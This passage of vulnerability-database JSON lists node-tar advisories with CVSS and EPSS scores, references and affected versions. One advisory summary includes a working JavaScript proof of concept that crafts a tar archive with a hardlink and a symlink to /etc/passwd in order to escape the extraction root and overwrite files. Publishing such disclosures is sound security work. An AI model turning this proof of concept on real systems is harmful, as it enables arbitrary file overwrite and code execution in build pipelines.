`.env`, secrets", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24842.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24842.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24842", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04676", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04653", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05631", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05635", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05672", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05699", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05678", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0567", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05664", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0562", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24842" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24842" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-28T14:55:08Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-28T14:55:08Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433645", "reference_id": "2433645", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433645" }, { "reference_url": "https://github.com/advisories/GHSA-34x7-hfp2-rc4v", "reference_id": "GHSA-34x7-hfp2-rc4v", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-34x7-hfp2-rc4v" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2900", "reference_id": "RHSA-2026:2900", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2900" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5447", "reference_id": "RHSA-2026:5447", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5447" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/61543?format=api", "purl": "pkg:npm/tar@7.5.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-qunt-xms1-a3cc" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@7.5.7" } ], "aliases": [ "CVE-2026-24842", "GHSA-34x7-hfp2-rc4v" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xqpk-t1d2-yqak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20719?format=api", "vulnerability_id": "VCID-yy79-dbn9-7bd5", "summary": "node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization\n### Summary\n\nThe `node-tar` library (`<= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets.\n\n### Details\n\nThe vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods.\n\n**1. Hardlink Escape (Arbitrary File Overwrite)**\n\nThe extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path.\n\nThe library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., `/etc/passwd`) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.\n\n**2. Symlink Poisoning**\n\nThe extraction logic passes the user-supplied `entry.linkpath` directly to `fs.symlink` without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (`../../`), even when secure extraction defaults are used.\n\n### PoC\n\nThe following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to `/etc/passwd`). It then extracts the archive using standard `node-tar` settings and demonstrates the vulnerability by verifying that the local \"secret\" file was successfully overwritten.\n\n```javascript\nconst fs = require('fs')\nconst path = require('path')\nconst tar = require('tar')\n\nconst out = path.resolve('out_repro')\nconst secret = path.resolve('secret.txt')\nconst tarFile = path.resolve('exploit.tar')\nconst targetSym = '/etc/passwd'\n\n// Cleanup & Setup\ntry { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}\nfs.mkdirSync(out)\nfs.writeFileSync(secret, 'ORIGINAL_DATA')\n\n// 1. Craft malicious Link header (Hardlink to absolute local file)\nconst h1 = new tar.Header({\n path: 'exploit_hard',\n type: 'Link',\n size: 0,\n linkpath: secret \n})\nh1.encode()\n\n// 2. Craft malicious Symlink header (Symlink to /etc/passwd)\nconst h2 = new tar.Header({\n path: 'exploit_sym',\n type: 'SymbolicLink',\n size: 0,\n linkpath: targetSym \n})\nh2.encode()\n\n// Write binary tar\nfs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))\n\nconsole.log('[*] Extracting malicious tarball...')\n\n// 3. Extract with default secure settings\ntar.x({\n cwd: out,\n file: tarFile,\n preservePaths: false\n}).then(() => {\n console.log('[*] Verifying payload...')\n\n // Test Hardlink Overwrite\n try {\n fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')\n \n if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {\n console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')\n } else {\n console.log('[-] Hardlink failed')\n }\n } catch (e) {}\n\n // Test Symlink Poisoning\n try {\n if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {\n console.log('[+] VULN CONFIRMED: Symlink points to absolute path')\n } else {\n console.log('[-] Symlink failed')\n }\n } catch (e) {}\n})\n\n```\n\n### Impact\n\n* **Arbitrary File Overwrite:** An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.\n* **Remote Code Execution (RCE):** In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all `Link` and `SymbolicLink` tar entries from extracted packages.)", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23745.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23745.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23745", "reference_id": "", "reference_type": "", "scores": [ { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00506", "published_at": "2026-04-16T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00507", "published_at": "2026-04-12T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.0051", "published_at": "2026-04-13T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00523", "published_at": "2026-04-02T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00511", "published_at": "2026-04-18T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00514", "published_at": "2026-04-07T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00516", "published_at": "2026-04-04T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00509", "published_at": "2026-04-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23745" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T14:52:52Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T14:52:52Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430538", "reference_id": "2430538", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430538" }, { "reference_url": "https://github.com/advisories/GHSA-8qq5-rm4j-mr97", "reference_id": "GHSA-8qq5-rm4j-mr97", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8qq5-rm4j-mr97" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2144", "reference_id": "RHSA-2026:2144", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2144" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2900", "reference_id": "RHSA-2026:2900", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2900" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2926", "reference_id": "RHSA-2026:2926", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2926" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3782", "reference_id": "RHSA-2026:3782", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3782" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/62464?format=api", "purl": "pkg:npm/tar@7.5.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@7.5.3" } ], "aliases": [ "CVE-2026-23745", "GHSA-8qq5-rm4j-mr97" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yy79-dbn9-7bd5" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/10991?format=api", "vulnerability_id": "VCID-e7n4-x8sc-3bb6", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nThe npm package \"tar\" (aka node-tar) before versions 6.1.2, 5.0.7, 4.4.15, and 3.2.3 has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-32803.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-32803.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32803", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36892", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36915", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36899", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36848", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.3702", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36985", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36829", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36908", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36863", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36888", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0016", "scoring_system": "epss", "scoring_elements": "0.36923", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32803" }, { "reference_url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32803", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32803" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/46fe35083e2676e31c4e0a81639dce6da7aaa356", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/46fe35083e2676e31c4e0a81639dce6da7aaa356" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/5987d9a41f6bfbf1ddab1098e1fdcf1a5618f571", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/5987d9a41f6bfbf1ddab1098e1fdcf1a5618f571" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/85d3a942b4064e4ff171f91696fced7975167349", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/85d3a942b4064e4ff171f91696fced7975167349" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20" }, { "reference_url": "https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20" }, { "reference_url": "https://www.npmjs.com/advisories/1771", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1771" }, { "reference_url": "https://www.npmjs.com/package/tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/package/tar" }, { "reference_url": "https://www.oracle.com/security-alerts/cpuoct2021.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990415", "reference_id": "1990415", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990415" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=992110", "reference_id": "992110", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=992110" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32803", "reference_id": "CVE-2021-32803", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32803" }, { "reference_url": "https://github.com/advisories/GHSA-r628-mhmh-qjhw", "reference_id": "GHSA-r628-mhmh-qjhw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r628-mhmh-qjhw" }, { "reference_url": "https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw", "reference_id": "GHSA-r628-mhmh-qjhw", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3280", "reference_id": "RHSA-2021:3280", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3280" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3281", "reference_id": "RHSA-2021:3281", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3281" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3623", "reference_id": "RHSA-2021:3623", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3623" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3638", "reference_id": "RHSA-2021:3638", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3638" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3639", "reference_id": "RHSA-2021:3639", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3639" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3666", "reference_id": "RHSA-2021:3666", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3666" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:5086", "reference_id": "RHSA-2021:5086", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:5086" }, { "reference_url": "https://usn.ubuntu.com/USN-5283-1/", "reference_id": "USN-USN-5283-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5283-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/37944?format=api", "purl": "pkg:npm/tar@3.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1tz4-bphw-rbd3" }, { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-7mtb-yaq7-77ep" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-m4hj-dq8q-67f6" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@3.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/37945?format=api", "purl": "pkg:npm/tar@4.4.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1tz4-bphw-rbd3" }, { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-7mtb-yaq7-77ep" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-m4hj-dq8q-67f6" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@4.4.15" }, { "url": "http://public2.vulnerablecode.io/api/packages/37946?format=api", "purl": "pkg:npm/tar@5.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1tz4-bphw-rbd3" }, { "vulnerability": 